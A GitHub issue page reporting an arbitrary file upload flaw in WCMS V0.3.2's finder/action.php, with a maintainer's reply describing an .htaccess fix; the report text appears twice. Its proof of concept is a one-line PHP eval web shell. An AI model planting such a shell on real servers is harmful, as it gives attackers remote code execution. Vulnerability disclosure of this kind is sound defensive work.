You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php
Affected software:WCMS V0.3.2
Type of vulnerability: Arbitrary File Upload
Discovered by: Yu Yang
Use this upload feature in the developer/finder:
and we can upload arbitrary file in the web server,it allows attackers upload malicious code
POC(2.php): <?php @eval($_POST[c]);?>
code:
i hope you can fix it
The text was updated successfully, but these errors were encountered:
Hello.
I have maid some changes to project structure. Now there have public folder, where would be user files. In that folder I have added .htaccess file that prevent execution of php code in public folder. Maybe this is not elegant fix, but quick and work good. I'm only start this fork, so I would fix next issues, when I have free time. https://github.com/cryptoprof/wcms/tree/feature/securityFix
A Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php
Affected software:WCMS V0.3.2
Type of vulnerability: Arbitrary File Upload
Discovered by: Yu Yang
Use this upload feature in the developer/finder:
and we can upload arbitrary file in the web server,it allows attackers upload malicious code
POC(2.php):
<?php @eval($_POST[c]);?>
code:
i hope you can fix it
The text was updated successfully, but these errors were encountered: